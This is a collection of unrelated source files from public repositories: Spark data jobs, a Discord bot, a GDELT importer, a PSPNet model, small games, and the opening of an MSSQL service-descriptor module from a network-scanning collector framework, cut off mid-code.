{\"page_name\": \"Luftfeuchtigkeit\", \"form\": form, \"humidityList\":humidityList })","repo_name":"ronBruetsch01/SmarthomeWeb","sub_path":"smarthomeweb_proj/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"2805194674","text":"from customer360.utilities.spark_util import get_spark_session, get_spark_empty_df\nfrom customer360.utilities.re_usable_functions import check_empty_dfs, data_non_availability_and_missing_check\nfrom kedro.context.context import load_context\nfrom pathlib import Path\nimport os, logging\nfrom pyspark.sql import DataFrame, functions as f\n\nconf = os.getenv(\"CONF\", None)\n\n\ndef union_weekly_cust_profile(\n cust_prof_daily_df: DataFrame,\n exception_partition=None\n\n):\n ################################# Start Implementing Data availability checks #############################\n if check_empty_dfs([cust_prof_daily_df]):\n return get_spark_empty_df()\n\n cust_prof_daily_df = data_non_availability_and_missing_check(df=cust_prof_daily_df, grouping=\"weekly\",\n par_col=\"event_partition_date\",\n missing_data_check_flg='Y',\n target_table_name=\"l2_customer_profile_union_weekly_feature\",\n exception_partitions=exception_partition)\n\n if check_empty_dfs([cust_prof_daily_df]):\n return get_spark_empty_df()\n\n ################################# End Implementing Data availability checks ###############################\n\n cust_prof_daily_df = cust_prof_daily_df.drop(\"start_of_month\")\n\n sql_stmt = \"\"\"\n with ranked_cust_profile as (\n select \n *,\n row_number() over (partition by subscription_identifier, start_of_week\n order by event_partition_date desc) as _rnk\n from cust_prof_daily_df\n )\n select *\n from ranked_cust_profile\n where _rnk = 1\n \"\"\"\n\n def divide_chunks(l, n):\n # looping till length l\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n CNTX = load_context(Path.cwd(), env=conf)\n dates_list = cust_prof_daily_df.select('start_of_week').distinct().collect()\n mvv_array = [row[0] for row in dates_list if row[0] != \"SAMPLING\"]\n mvv_array = sorted(mvv_array)\n logging.info(\"Dates to run for {0}\".format(str(mvv_array)))\n\n mvv_new = list(divide_chunks(mvv_array, 10))\n add_list = mvv_new\n\n first_item = add_list[-1]\n\n add_list.remove(first_item)\n spark = get_spark_session()\n for curr_item in add_list:\n logging.info(\"running for dates {0}\".format(str(curr_item)))\n small_df = cust_prof_daily_df.filter(f.col(\"start_of_week\").isin(*[curr_item]))\n small_df.createOrReplaceTempView(\"cust_prof_daily_df\")\n small_df = spark.sql(sql_stmt).drop(\"_rnk\", \"event_partition_date\")\n CNTX.catalog.save(\"l2_customer_profile_union_weekly_feature\", small_df)\n\n logging.info(\"Final date to run for {0}\".format(str(first_item)))\n return_df = cust_prof_daily_df.filter(f.col(\"start_of_week\").isin(*[first_item]))\n return_df.createOrReplaceTempView(\"cust_prof_daily_df\")\n return_df = spark.sql(sql_stmt).drop(\"_rnk\", \"event_partition_date\")\n\n return return_df\n\n","repo_name":"Namonsasip/c360_pr","sub_path":"src/customer360/pipelines/data_engineering/nodes/customer_profile_nodes/to_l2/to_l2_nodes.py","file_name":"to_l2_nodes.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"19847189293","text":"from enum import Enum\nfrom time import sleep\nfrom multiprocessing import Queue\nfrom arquants.cerebro import AQCerebro\nfrom arquants.definitions import aqhandler\nfrom arquants.stores.aq_store import AQStore\n\n\nclass MDSubsType(Enum):\n AGGREGATED = 'aggregated'\n DISAGGREGATED = 'disaggregated'\n TOP = 'top'\n\n\nclass Symbol:\n\n def __init__(self, market=None, symbol=None, md_type: MDSubsType = None):\n self.market = market\n self.symbol = symbol\n self.md_type = md_type\n\n\nclass Initiator:\n\n def __init__(self, symbols=None, strat_cls=None):\n aqhandler.init_public_aq()\n if not aqhandler.get_account():\n raise Exception(\"No account\")\n\n queue = Queue()\n store = AQStore(queue)\n broker = store.getbroker()\n\n self.cerebro = AQCerebro(queue, quicknotify=True, stdstats=False)\n self.cerebro.setbroker(broker)\n\n for item in symbols:\n market = item.market\n symbol = item.symbol\n md_type = item.md_type\n\n data_cls = store.getdataclass(md_type.value)\n data = data_cls(dataname=symbol, account=aqhandler.get_account(), routingkey='rk-rofx-income',\n market=market, price_size=1)\n\n self.cerebro.adddata(data)\n\n self.cerebro.addstrategy(strat_cls)\n\n # Le doy unos segundos para que se conecte a la api y al websocket.\n sleep(2)\n\n def start(self):\n sleep(2)\n self.cerebro.run()\n","repo_name":"webclinic017/aq","sub_path":"site-packages/arquants/initiator.py","file_name":"initiator.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37229842865","text":"import discord\nfrom discord.ext import commands\nimport asyncio\nimport os\n\nimport src.connection as connection\nfrom src.mode_manager import ModeManager\nfrom src.greeting import Greeter\nimport src.config as cfg\n\n\nclass Base(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.command()\n async def hello(self, ctx: commands.Context):\n \"\"\"\n Send \"Hello World!\"\n \"\"\"\n await ctx.channel.send('**Hello World!**')\n\n @commands.command()\n async def connect(self, ctx: commands.Context, number: str):\n \"\"\"\n Connect to the voice channel, which is placed in the guild where this command is recalled\n and which has required number\n \"\"\"\n\n if not number.isdigit():\n await ctx.channel.send('Неправильный аргумент') # 1\n return\n\n number = int(number)\n\n if not (1 <= number <= len(ctx.guild.voice_channels)):\n await ctx.channel.send('Неправильный аргумент') # 2\n return\n\n new_channel = ctx.guild.voice_channels[number - 1]\n await connection.connect(self.bot, new_channel)\n\n @commands.command()\n async def disconnect(self, ctx: commands.Context):\n \"\"\"\n disconnect from any voice channel\n \"\"\"\n await ctx.guild.change_voice_state(channel=None,\n self_mute=False,\n self_deaf=False)\n\n @commands.command()\n async def voice_members_info(self, ctx: commands.Context):\n \"\"\"\n Send info about members in all voice channels\n \"\"\"\n for channel in ctx.guild.voice_channels:\n await ctx.channel.send(channel)\n for member in channel.members:\n await ctx.channel.send(member)\n\n @commands.command()\n async def members_info(self, ctx: commands.Context):\n \"\"\"\n Send info about members\n \"\"\"\n members = ctx.guild.members\n await ctx.channel.send(members)\n\n @commands.command()\n async def members_brief_info(self, ctx: commands.Context):\n \"\"\"\n Send brief info about members\n \"\"\"\n members = ctx.guild.members\n result = ''\n for i in range(len(members)):\n result += 'name: ' + members[i].name + ', '\n result += 'id: ' + str(members[i].id) + ', '\n result += 'discriminator: ' + members[i].discriminator\n result += '\\n'\n await ctx.channel.send(result)\n\n\nclass Mode(commands.Cog):\n def __init__(self, bot: commands.Bot, mm: ModeManager):\n self.bot = bot\n self.mm = mm\n\n @commands.command()\n async def get_mode(self, ctx):\n \"\"\"Get current mode\"\"\"\n await ctx.channel.send('mode = {0}'.format(self.mm.get_mode()))\n\n @commands.command()\n async def set_mode(self, ctx, new_mode):\n \"\"\"\n Set mode (0 - off; 1 - mode 1; 2 - mode 2)\n \"\"\"\n if new_mode not in ['0', '1', '2']:\n await ctx.channel.send('Неправильный аргумент') # 2\n return\n new_mode = int(new_mode)\n await self.mm.set_mode(self.bot, new_mode)\n await ctx.channel.send('mode = {0}'.format(self.mm.get_mode())) # 3\n\n @commands.command()\n async def set_voice_channel(self, ctx, number):\n \"\"\"\n Set voice channel for mode 2\n \"\"\"\n\n if not number.isdigit():\n await ctx.channel.send('Неправильный аргумент')\n return\n\n new_channel = self.mm.voice_channel_for_mode_2\n\n if number.isdigit():\n number = int(number)\n if 1 <= number <= len(ctx.guild.voice_channels):\n new_guild = ctx.guild\n new_channel = ctx.guild.voice_channels[number - 1]\n\n if not new_guild.me.permissions_in(new_channel).connect:\n await ctx.channel.send('Нет доступа к этому каналу')\n return\n\n elif number == 0:\n new_channel = None\n\n else:\n await ctx.channel.send('Неправильное число')\n return\n\n await self.mm.set_voice_channel(self.bot, new_channel)\n\n # send response\n if self.mm.voice_channel_for_mode_2 is None:\n await ctx.channel.send('Номер голосового чата сброшен')\n else:\n addition = 'Название: ' + self.mm.voice_channel_for_mode_2.name\n await ctx.channel.send('Номер голосового чата: ' +\n str(number) +\n '\\n' + addition)\n\n\nclass Greet(commands.Cog):\n def __init__(self, bot: commands.Bot, gr: Greeter):\n self.bot = bot\n self.gr = gr\n\n @commands.command()\n async def play_greet(self, ctx: commands.Context):\n \"\"\"\n if bot is connected play greeting message\n \"\"\"\n executable_path = cfg.executable_path\n if connection.is_connected(self.bot):\n voice_client = self.bot.voice_clients[0]\n if os.name == 'nt':\n voice_client.play(discord.FFmpegPCMAudio(executable=executable_path,\n source=self.gr.greet_path))\n elif os.name == 'posix':\n voice_client.play(discord.FFmpegPCMAudio(source=self.gr.greet_path))\n\n while voice_client.is_playing():\n await asyncio.sleep(1)\n\n @commands.command()\n async def get_greet(self, ctx: commands.Context):\n \"\"\"\n Get current greeting message\n \"\"\"\n await ctx.channel.send('greet = {0}'.format(self.gr.get_greet()))\n\n @commands.command()\n async def set_greet(self, ctx: commands.Context, new_greet: str):\n \"\"\"\n Set greeting message\n \"\"\"\n new_greet = ' '.join(new_greet.split('_'))\n self.gr.set_greet(new_greet)\n await ctx.channel.send('greet = {0}'.format(self.gr.get_greet()))\n\n @commands.command()\n async def set_default_greet(self, ctx: commands.Context):\n \"\"\"\n Set default greeting message\n \"\"\"\n self.gr.set_default_greet()\n await ctx.channel.send('greet = {0}'.format(self.gr.get_greet()))\n\n @commands.command()\n async def set_name(self, ctx: commands.Context,\n name_and_disc: str,\n extra_name: str):\n \"\"\"\n Set special name (extra_name) for some user (name_and_disc)\n \"\"\"\n extra_name = ' '.join(extra_name.split('_'))\n mes = self.gr.set_name(name_and_disc, extra_name, ctx.guild.members)\n await ctx.channel.send(mes)\n\n @commands.command()\n async def get_name(self, ctx, name_and_disc):\n \"\"\"\n Get name (rewrite)\n \"\"\"\n await ctx.channel.send(self.gr.get_name(name_and_disc, ctx.guild.members))\n\n @commands.command()\n async def extra_names(self, ctx, arg):\n \"\"\"\n Include or exclude extra names (0 - off, 1 - on)\n \"\"\"\n if arg == '0':\n self.gr.extra_names_off()\n await ctx.channel.send('Дополнительные имена теперь не доступны')\n\n elif arg == '1':\n self.gr.extra_names_on()\n await ctx.channel.send('Дополнительные имена теперь доступны')\n\n else:\n await ctx.channel.send('Неправильный аргумент')\n\n","repo_name":"SanchoPanso/greeting_discord_bot","sub_path":"src/cogs.py","file_name":"cogs.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8993485842","text":"#greedy approach - not optimal\ndef PredictTheWinner(nums):\n score1 = 0\n score2 = 0\n print(nums)\n while len(nums)>1:\n score1t = max(nums[0],nums[-1])\n print(\"player1's turn takes\", score1t)\n if nums[0]> nums[-1]:\n nums = nums[1:]\n else:\n \n nums = nums[:-1]\n #print(nums)\n score1 +=score1t\n\n score2t = max(nums[0],nums[-1])\n print(\"player2's turn takes\",score2t)\n if nums[0]> nums[-1]:\n nums = nums[1:]\n else:\n \n nums = nums[:-1]\n print(nums)\n score2 +=score2t\n if len(nums)==1:\n score1+=nums[0]\n\n \n print(score1, score2)\n return score2 dict:\n try:\n templateFile = open(\"response.json\", \"r\")\n except:\n print(\"Response template is kept in response.json file, please add them there!\")\n raise\n \n responseTemplate = json.load(templateFile)\n templateFile.close()\n \n for k, v in responseTemplate.items():\n if k in dataMock:\n responseTemplate.update({k:dataMock[k]})\n \n return responseTemplate\n","repo_name":"ZuyRzuuf/iot_web-server","sub_path":"createResponse.py","file_name":"createResponse.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14722647753","text":"import datetime\nimport json\nimport gdelt\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.db.utils import DataError\nfrom django.utils import timezone\nfrom djdelt.models import GKGDocument, GKGMedia\n\n\nclass Command(BaseCommand):\n help = 'Get updates from GDELT'\n\n def add_arguments(self, parser):\n parser.add_argument('table', nargs=1, type=str, choices=('events', 'mentions', 'gkg') )\n parser.add_argument('dates', nargs='?', type=str)\n parser.add_argument(\n '--coverage',\n action='store_true',\n dest='coverage',\n help='Fetch full coverage in specified date range'\n )\n\n def handle(self, table, dates, *args, **options):\n table = table[0]\n if not dates:\n dates = timezone.now().date().isoformat()\n gd2 = gdelt.gdelt(version=2)\n coverage = options['coverage']\n results = gd2.Search(dates, table=table, output='json', coverage=coverage)\n data = json.loads(results)\n for item in data:\n doc = GKGDocument.objects.filter(gkg_record_id=item['GKGRECORDID']).first()\n if doc:\n print('Skipping existing: %s' % item['GKGRECORDID'])\n else:\n print(item['GKGRECORDID'])\n doc = GKGDocument()\n doc.gkg_record_id = item['GKGRECORDID']\n try:\n dt = datetime.datetime.strptime(str(item['DATE']), '%Y%m%d%H%M%S')\n except ValueError:\n dt = None\n doc.date = dt\n doc.source_collection = item['SourceCollectionIdentifier']\n doc.source_common_name = item['SourceCommonName'] or ''\n doc.document_identifier = item['DocumentIdentifier'] or ''\n doc.v1counts = item['Counts'] or ''\n doc.v2counts = item['V2Counts'] or ''\n doc.v1themes = item['Themes'] or ''\n doc.v2themes = item['V2Themes'] or ''\n doc.v1locations = item['Locations'] or ''\n doc.v2locations = item['V2Locations'] or ''\n doc.v1persons = item['Persons'] or ''\n doc.v2persons = item['V2Persons'] or ''\n doc.v1organizations = item['Organizations'] or ''\n doc.v2organizations = item['V2Organizations'] or ''\n doc.tone = item['V2Tone'] or ''\n doc.dates = item['Dates'] or ''\n doc.gcam = item['GCAM'] or ''\n img = item['SharingImage'] or ''\n doc.sharing_image = img[:1024]\n doc.quotations = item['Quotations'] or ''\n doc.all_names = item['AllNames'] or ''\n doc.amounts = item['Amounts'] or ''\n doc.translation_info = item['TranslationInfo'] or ''\n doc.extras_xml = item['Extras'] or ''\n try:\n doc.save()\n except DataError:\n print('Unable to save GKG Document: %s' % doc.gkg_record_id)\n continue\n for url in item['RelatedImages'].split(';') \\\n if item['RelatedImages'] else []:\n if url.strip():\n GKGMedia(\n document=doc,\n url=url.strip()[:1024],\n media_type='RELATED_IMAGE').save()\n for url in item['SocialImageEmbeds'].split(';') \\\n if item['SocialImageEmbeds'] else []:\n if url.strip():\n GKGMedia(\n document=doc,\n url=url.strip()[:1024],\n media_type='SOCIAL_IMAGE_EMBED').save()\n for url in item['SocialVideoEmbeds'].split(';') \\\n if item['SocialVideoEmbeds'] else []:\n if url.strip():\n GKGMedia(\n document=doc,\n url=url.strip()[:1024],\n media_type='SOCIAL_VIDEO_EMBED').save()\n","repo_name":"scott2b/django-gdelt","sub_path":"djdelt/management/commands/gdelt.py","file_name":"gdelt.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37194531271","text":"from torchvision.models import resnet50, resnet101\nfrom torchvision.models._utils import IntermediateLayerGetter\nimport torch\nimport torch.nn as nn\n\n\nbackbone = IntermediateLayerGetter(\n resnet101(pretrained=False, replace_stride_with_dilation=[False, True, True]),\n return_layers={'layer3': 'aux', 'layer4': 'stage4'}\n)\n\nx = torch.randn(1, 3, 224, 224).cpu()\nresult = backbone(x)\nfor k, v in result.items():\n print(k, v.shape)\n\n\n# Pyramid Pooling Module\nclass PPM(nn.ModuleList):\n def __init__(self, pool_sizes, in_channels, out_channels):\n super(PPM, self).__init__()\n self.pool_sizes = pool_sizes\n self.in_channels = in_channels\n self.out_channels = out_channels\n\n for pool_size in pool_sizes: # 1*1,2*2,3*3,6*6\n self.append(\n nn.Sequential(\n nn.AdaptiveMaxPool2d(pool_size),\n nn.Conv2d(self.in_channels, self.out_channels, kernel_size=1),\n )\n )\n\n def forward(self, x):\n out_puts = []\n for ppm in self:\n # 对每一个特征图利用双线性插值上采样得到原特征图相同的size,利用双线性插值上采样得到原特征图相同的size\n ppm_out = nn.functional.interpolate(ppm(x), size=x.size()[-2:], mode='bilinear', align_corners=True)\n out_puts.append(ppm_out)\n return out_puts\n\n\n\n# PSPhead-利用特征获得最终的预测结果\n# 利用加强特征获得预测结果\n# 1.利用一个3x3卷积对特征进行整合\n# 2.利用一个1x1卷积进行通道调整,调整成Num_Classes\n# 3.利用resize进行上采样使得最终输出层,宽高和输入图片一样\nclass PSPHEAD(nn.Module):\n def __init__(self, in_channels, out_channels, pool_sizes=[1, 2, 3, 6], num_classes=3): # 1*1,2*2,3*3,6*6\n super(PSPHEAD, self).__init__()\n self.pool_sizes = pool_sizes\n self.num_classes = num_classes\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.psp_modules = PPM(self.pool_sizes, self.in_channels, self.out_channels)\n self.final = nn.Sequential(\n nn.Conv2d(self.in_channels + len(self.pool_sizes) * self.out_channels, self.out_channels, kernel_size=3,\n padding=1),\n nn.BatchNorm2d(self.out_channels),\n nn.ReLU(),\n )\n\n def forward(self, x):\n out = self.psp_modules(x)\n out.append(x)\n out = torch.cat(out, 1)\n out = self.final(out)\n return out\n\n\n# 构建一个FCN分割头,用于计算辅助损失\nclass Aux_Head(nn.Module):\n def __init__(self, in_channels=1024, num_classes=3):\n super(Aux_Head, self).__init__()\n self.num_classes = num_classes\n self.in_channels = in_channels\n\n self.decode_head = nn.Sequential(\n nn.Conv2d(self.in_channels, self.in_channels // 2, kernel_size=3, padding=1),\n nn.BatchNorm2d(self.in_channels // 2),\n nn.ReLU(),\n\n nn.Conv2d(self.in_channels // 2, self.in_channels // 4, kernel_size=3, padding=1),\n nn.BatchNorm2d(self.in_channels // 4),\n nn.ReLU(),\n\n nn.Conv2d(self.in_channels // 4, self.num_classes, kernel_size=3, padding=1),\n\n )\n\n def forward(self, x):\n return self.decode_head(x)\n\n\n\n# pspnet输出两个部分,一部分用来算分割loss,一部分用来算分类loss,最后加权求和\nclass Pspnet(nn.Module):\n def __init__(self, num_classes, aux_loss=True):\n super(Pspnet, self).__init__()\n self.num_classes = num_classes\n self.backbone = IntermediateLayerGetter(\n resnet50(pretrained=False, replace_stride_with_dilation=[False, True, True]),\n return_layers={'layer3': \"aux\", 'layer4': 'stage4'}\n )\n self.aux_loss = aux_loss\n self.decoder = PSPHEAD(in_channels=2048, out_channels=512, pool_sizes=[1, 2, 3, 6],\n num_classes=self.num_classes)\n self.cls_seg = nn.Sequential(\n nn.Conv2d(512, self.num_classes, kernel_size=3, padding=1),\n )\n if self.aux_loss:\n self.aux_head = Aux_Head(in_channels=1024, num_classes=self.num_classes)\n\n def forward(self, x):\n _, _, h, w = x.size()\n feats = self.backbone(x)\n x = self.decoder(feats[\"stage4\"])\n x = self.cls_seg(x)\n x = nn.functional.interpolate(x, size=(h, w), mode='bilinear', align_corners=True)\n\n # 如果需要添加辅助损失\n if self.aux_loss:\n aux_output = self.aux_head(feats['aux'])\n aux_output = nn.functional.interpolate(aux_output, size=(h, w), mode='bilinear', align_corners=True)\n\n return {\"output\": x, \"aux_output\": aux_output}\n return {\"output\": x}\n\n\nif __name__ == \"__main__\":\n model = Pspnet(num_classes=3, aux_loss=True)\n a = torch.ones([1, 3, 224, 224])\n print(a.shape)\n\n","repo_name":"WYH67/Semantic-segmentation","sub_path":"PsPNet/PsPNet.py","file_name":"PsPNet.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"4698486576","text":"#!/usr/bin/env python3\n\"\"\"sortedAppreciateSQL.py\"\"\"\n\nimport argparse\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType\nimport time\n\n# Parse the arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--input\", help=\"the input path\")\nparser.add_argument(\"--output\", help=\"the output path\")\n\nargs = parser.parse_args()\n\ninput_path, output_path = args.input, args.output\n\n# Create the SparkSession\nspark = SparkSession.builder.appName(\"sortedAppreciateSQL\").getOrCreate()\n\n# Use sql to read the input file\nschema = StructType([\n StructField(\"Id\", IntegerType(), True),\n StructField(\"productId\", StringType(), True),\n StructField(\"userId\", StringType(), True),\n StructField(\"profileName\", StringType(), True),\n StructField(\"helpfulnessNumerator\", IntegerType(), True),\n StructField(\"helpfulnessDenominator\", IntegerType(), True),\n StructField(\"score\", StringType(), True),\n StructField(\"time\", StringType(), True),\n StructField(\"summary\", StringType(), True),\n StructField(\"text\", StringType(), True)\n])\n\n# calculate time elapsed\nstart_time = time.time()\n# ================================\ninput_df = spark.read.option(\"quote\", \"\\\"\") \\\n .csv(input_path, header=False, schema=schema) \\\n .cache()\n\n# Use sql to filter the input file\nfiltered_df = input_df.select(\"userId\", \"helpfulnessNumerator\", \"helpfulnessDenominator\").filter(\"helpfulnessNumerator >= 0 and helpfulnessDenominator > 0 and helpfulnessNumerator <= helpfulnessDenominator\") \\\n .withColumn(\"appreciate\", input_df[\"helpfulnessNumerator\"] / input_df[\"helpfulnessDenominator\"]) \\\n .select(\"userId\", \"appreciate\").groupBy(\"userId\").avg(\"appreciate\").orderBy(\"avg(appreciate)\", ascending=False)\n# ================================\nend_time = time.time()\n\n# Print the time elapsed\nprint(\"Time elapsed: \", end_time - start_time)\n# Write the first 10 rows of the output file\nfiltered_df.show(10)\n\n# Write the output file\nfiltered_df.write.csv(output_path)","repo_name":"LeafTeamMates/BigData1","sub_path":"Job2/Spark/sortedAppreciateSQL.py","file_name":"sortedAppreciateSQL.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13585100556","text":"from random import randint\nfrom collections import deque\nimport pickle\nimport os\n\ntarget = randint(0,100)\n\nif os.path.exists('history.txt'):\n\t#使用load()将数据从文件中序列化读出 \n\td = pickle.load(open('history.txt','rb'))\n\t#print('exit')\nelse:\n\td = deque([],5)\n\t#print('not exit')\n\ndef guess(num):\n\tif num == target:\n\t\tprint('well down')\n\t\treturn 1\n\telif num > target:\n\t\tprint('you are bigger than target')\n\telse :\n\t\tprint('you are smaller than target')\n\treturn 0\nwhile True:\n\tline = input(\"input:\")\n\tif line.isdigit():\n\t\tnum = int(line)\n\t\td.append(num)\n\t\tif guess(num):\n\t\t\tbreak\n\telif line == \"history\" or line == \"h?\":\n\t\tprint(list(d))\n\telif line == 'quit':\n\t\tbreak\n#使用dump()将数据序列化到文件中 \t\t\nfw = open('history.txt','wb') \npickle.dump(d, fw) \nfw.close() \n","repo_name":"feiwenli/PythonLearning","sub_path":"EfficientCoding/2-7.py","file_name":"2-7.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74914240740","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.exc import OperationalError\nfrom base import Base\nfrom models.news import News\n\nimport json\n\n# get data from json config file\nwith open('config.json') as c:\n config = json.load(c)\n\n# get database config\ndb_config = config['database']\n\n# set connection to database\nengine = create_engine(\n 'postgresql://{0}:{1}@{2}:{3}/{4}'.format(\n db_config['username'],\n db_config['password'],\n db_config['host'],\n db_config['port'],\n db_config['database']\n )\n)\n\n# check if module was connected to database\ntry:\n engine.connect().close()\n print('connected')\n# or raise exception\nexcept OperationalError as e:\n exit(e)\n\n# create tables by models if not exist\nBase.metadata.create_all(engine, checkfirst=True)\n\n","repo_name":"aynm142/news_parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39340903754","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2018/6/11 10:49\r\n# @Author : Gan\r\n# @File : export_to_db.py\r\n\r\n\r\nimport os\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom tool import KunlunFormat\r\n\r\ndata_dir = 'data/suining'\r\n\r\nedge = pd.DataFrame()\r\nvertex = pd.DataFrame()\r\nfor file in os.listdir(data_dir):\r\n if file.startswith('edge_info'):\r\n edge = edge.append(pd.read_csv(os.path.join(data_dir, file), encoding='utf8'))\r\n elif file.startswith('vertex_info'):\r\n vertex = vertex.append(pd.read_csv(os.path.join(data_dir, file), encoding='utf8'))\r\n\r\nid_list = np.arange(len(vertex))\r\nvertex['uid'] = id_list\r\nvertex['uid'] = vertex['uid'].apply(str)\r\n\r\n\r\ndef lookup_label(name):\r\n row = vertex[vertex['name'] == name].iloc[0]\r\n return row['label']\r\n\r\n\r\ndef lookup_uid(name):\r\n row = vertex[vertex['name'] == name].iloc[0]\r\n return row['uid']\r\n\r\n\r\nedge['start_type'] = edge['start_name'].apply(lambda x: lookup_label(x))\r\nedge['end_type'] = edge['end_name'].apply(lambda x: lookup_label(x))\r\nedge['start_uid'] = edge['start_name'].apply(lambda x: lookup_uid(x))\r\nedge['end_uid'] = edge['end_name'].apply(lambda x: lookup_uid(x))\r\n\r\nedge = edge[['start_type', 'start_uid', 'end_type', 'end_uid', 'relation']]\r\nedge['start_time'] = '2007/01/01'\r\nedge['end_time'] = '2007/01/01'\r\n\r\nkl = KunlunFormat()\r\nvertex_kl_dict, vertex_kl_meta = kl.parse_vertex(vertex, col_rel='label')\r\nedge_kl_dict, edge_kl_meta = kl.parse_edge(edge, start_label='start_type', end_label='end_type',\r\n relation_type='relation')\r\nmeta = pd.concat([vertex_kl_meta, edge_kl_meta])\r\n\r\n#################################################################################\r\n# 导出 CSV格式\r\n#################################################################################\r\nresult_dir = 'result/csv_format'\r\ntry:\r\n os.makedirs(os.path.join(data_dir, result_dir))\r\nexcept FileExistsError:\r\n pass\r\n\r\nkl.to_csv(os.path.join(data_dir, result_dir), vertex_kl_dict, edge_kl_dict, meta)\r\n","repo_name":"XuJ/KnowledgeGraphExample","sub_path":"export_to_db.py","file_name":"export_to_db.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38850761458","text":"# -*- coding: utf-8 -*-\n\"\"\"\nimplements all base functionality for Microsoft SQL Server (MSSQL) collectors\n\"\"\"\n\n__author__ = \"Lukas Reiter\"\n__license__ = \"GPL v3.0\"\n__copyright__ = \"\"\"Copyright 2018 Lukas Reiter\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n\"\"\"\n__version__ = 0.1\n\nfrom typing import List\nfrom database.model import Service\nfrom database.model import ServiceState\nfrom database.model import ProtocolType\nfrom collectors.os.modules.core import BaseCollector\nfrom collectors.os.modules.core import BaseHydra\nfrom collectors.os.modules.core import ServiceDescriptorBase\nfrom collectors.os.modules.core import BaseNmap\nfrom collectors.os.modules.core import BaseExtraServiceInfoExtraction\nfrom collectors.core import XmlUtils\nfrom sqlalchemy.orm.session import Session\n\n\nclass MsSqlServiceDescriptor(ServiceDescriptorBase):\n \"\"\"\n This class describes how an MSSQL service looks like\n \"\"\"\n\n def __init__(self):\n super().__init__(default_tcp_ports=[1433, 1434, 9152],\n default_udp_ports=[1433, 1434, 9152],\n nmap_tcp_service_names=[\"^ms\\-sql\\-.*$\"],\n nmap_udp_service_names=[\"^ms\\-sql\\-.*$\"],\n nessus_tcp_service_names=[\"^mssql$\", \"^ms\\-sql\\-.*$\"],\n nessus_udp_service_names=[\"^mssql$\", \"^ms\\-sql\\-.*$\"])\n\n\nclass BaseMsSqlCollector(BaseCollector):\n \"\"\"\n This is the base class for all MSSQL collectors\n \"\"\"\n\n def __init__(self, priority, timeout, **kwargs):\n super().__init__(priority=priority,\n timeout=timeout,\n service_descriptors=MsSqlServiceDescriptor(),\n **kwargs)\n\n\nclass BaseMsSqlHydra(BaseHydra):\n \"\"\"\n This class implements basic functionality for MSSQL collectors that use Hydra.\n \"\"\"\n def __init__(self, priority, timeout, **kwargs):\n super().__init__(priority=priority,\n timeout=timeout,\n service_descriptors=MsSqlServiceDescriptor(),\n **kwargs)\n\n\nclass BaseMsSqlNmap(BaseNmap):\n \"\"\"\n This class implements basic functionality for rpcbind collectors that use Nmap.\n \"\"\"\n def __init__(self, priority,\n timeout,\n nmap_xml_extractor_classes: List[BaseExtraServiceInfoExtraction],\n **kwargs):\n super().__init__(priority=priority,\n timeout=timeout,\n service_descriptors=MsSqlServiceDescriptor(),\n nmap_xml_extractor_classes=nmap_xml_extractor_classes,\n **kwargs)\n\n\nclass MsSqlExtraInfoExtraction(BaseExtraServiceInfoExtraction):\n \"\"\"\n This class extracts extra information (e.g. user names, SMB shares) from MS-SQL services.\n \"\"\"\n MSSQL_TCP_PORTS = \"ms-sql-info\"\n MSSQL_NTLM_INFO = \"ms-sql-ntlm-info\"\n MSSQL_SERVICE_NAME = [\"ms-sql-m\", \"ms-sql-s\"]\n\n def __init__(self, session: Session, service: Service, **args):\n super().__init__(session, service, **args)\n\n def _extract_sql_info(self, host_tag):\n \"\"\"This method extracts the required information.\"\"\"\n script = host_tag.findall(\"*/script/[@id='{}']\".format(MsSqlExtraInfoExtraction.MSSQL_TCP_PORTS))\n script_count = len(script)\n if script_count == 1:\n for table in script[0].findall(\"./table\"):\n tcp_port = XmlUtils.get_xml_text(table.findall(\".//*[@key='TCP port']\"))\n if tcp_port:\n service = self._domain_utils.add_service(session=self._session,\n port=tcp_port,\n protocol_type=ProtocolType.tcp,\n state=ServiceState.Open,\n 